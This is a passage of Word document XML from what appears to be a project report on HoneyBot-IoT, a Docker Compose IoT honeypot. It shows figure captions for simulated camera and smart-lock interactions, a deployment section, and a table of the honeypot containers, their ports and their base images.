      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">33</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: RTSP Exchange with the CCTV Camera (:554)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Default credentials return a bearer token; the unlock command changes the lock state for every protocol.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5120640" cy="2195401"/>
            <wp:docPr id="37" name="Picture 37"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="term_lock.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5120640" cy="2195401"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF3682" w14:textId="7FA23AD5" w:rsidR="003272AD" w:rsidRDefault="005C6601" w:rsidP="006238CF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">34</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Smart Lock REST API (:8081) — Token, Unlock and Status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF48B6F" w14:textId="54F0A1AE" w:rsidR="003272AD" w:rsidRPr="005C6601" w:rsidRDefault="005C6601" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="9030" w:name="_Toc69030"/>
      <w:r>
        <w:t xml:space="preserve">7.4 Deployment</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9030"/>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HoneyBot-IoT is deployed as a multi-container Docker application orchestrated by Docker Compose. The deployment is designed for reproducibility, isolation and automatic recovery. The same docker-compose.yml runs on an Ubuntu 24.04 LTS host and on Windows 10/11 with Docker Desktop (WSL 2 back-end); the 60% build was verified on both, and the 70% build was verified with a full docker compose up --build deployment on Linux (Docker 29).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F37E5F8" w14:textId="77777777" w:rsidR="002C2A3E" w:rsidRPr="006428C0" w:rsidRDefault="002C2A3E" w:rsidP="002C2A3E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9031" w:name="_Toc69031"/>
      <w:r>
        <w:t xml:space="preserve">Container Architecture</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9031"/>
    </w:p>
    <w:p w14:paraId="7608910A" w14:textId="32DFBA61" w:rsidR="00F0564A" w:rsidRDefault="00F0564A" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">12</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Docker Container Architecture (70%)</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00"/>
        <w:gridCol w:w="1800"/>
        <w:gridCol w:w="1600"/>
        <w:gridCol w:w="1400"/>
        <w:gridCol w:w="2360"/>
      </w:tblGrid>
      <w:tr w:rsidR="00240A5B" w14:paraId="5EF4BFC3" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="442EF1D8" w14:textId="77777777" w:rsidR="00240A5B" w:rsidRDefault="00240A5B" w:rsidP="00F0564A">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Container Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5800CAB4" w14:textId="77777777" w:rsidR="00240A5B" w:rsidRDefault="00240A5B" w:rsidP="00F0564A">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="316D3010" w14:textId="77777777" w:rsidR="00240A5B" w:rsidRDefault="00240A5B" w:rsidP="00F0564A">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Base Image</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="44D99307" w14:textId="77777777" w:rsidR="00240A5B" w:rsidRDefault="00240A5B" w:rsidP="00F0564A">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Host Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="69EA5CBD" w14:textId="77777777" w:rsidR="00240A5B" w:rsidRDefault="00240A5B" w:rsidP="00F0564A">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Function</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="4829F7C6" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">honeybot_ssh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">ssh_honeypot/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">python:3.12-slim (honeybot/honeypot)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">2222/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="236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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Paramiko SSH server, Smart Lock SmartLock-OS 2.1.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="4829F7C6" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">honeybot_telnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">telnet_honeypot/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">python:3.12-slim (honeybot/honeypot)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">2323/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="236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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">asyncio Telnet server, Industrial Sensor ISN-4000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="4829F7C6" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">honeybot_http</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">http_honeypot/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">python:3.12-slim (honeybot/honeypot)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">8080, 8443, 8081, 8082/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="236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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Camera panel (HTTP/HTTPS), lock REST API, sensor HMI</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="4829F7C6" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">honeybot_mqtt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">mqtt_honeypot/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">python:3.12-slim (honeybot/honeypot)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">1883/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="236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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">MQTT 3.1.1 broker with live telemetry and control topics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="4829F7C6" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">honeybot_rtsp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">rtsp_honeypot/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">python:3.12-slim (honeybot/honeypot)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">554 → 8554/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="236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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">RTSP camera, Basic + Digest authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="4829F7C6" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">honeybot_state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">device_state/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">python:3.12-slim (honeybot/honeypot)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">— (backnet)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="236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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Device State Manager simulation loop</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="4829F7C6" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">honeybot_db</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">init.sql</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">postgres:16-alpine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">— (backnet)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="236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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">PostgreSQL 16 with health check</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="4829F7C6" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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pPr>
